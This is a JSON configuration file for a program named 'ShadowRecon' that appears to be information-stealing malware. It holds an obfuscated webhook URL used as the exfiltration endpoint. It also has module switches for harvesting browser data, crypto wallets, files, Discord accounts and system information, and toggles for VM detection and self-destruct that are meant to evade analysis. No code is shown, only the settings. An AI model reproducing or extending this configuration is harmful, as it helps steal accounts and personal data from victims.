{
  "app": {
    "name": "ShadowRecon",
    "version": "3.0.0",
    "environment": "development"
  },
  "webhook": {
    "url": "2jj34CtoUw2zFKnL1X4IckbaPzbl7k+4orSmStsqk26C5NviF6RKnJFOrtEiuoV1ekpxY4jwmwWOsIuGrT1M3wM=",
    "timeout": 30000
  },
  "paths": {
    "temp": "/tmp",
    "output": "./output"
  },
  "modules": {
    "enabled": {
      "browsers": true,
      "crypto": false,
      "files": false,
      "discord": true,
      "system": true,
      "injection": false
    }
  },
  "security": {
    "enableVmDetection": false,
    "enableSelfDestruct": false
  }
}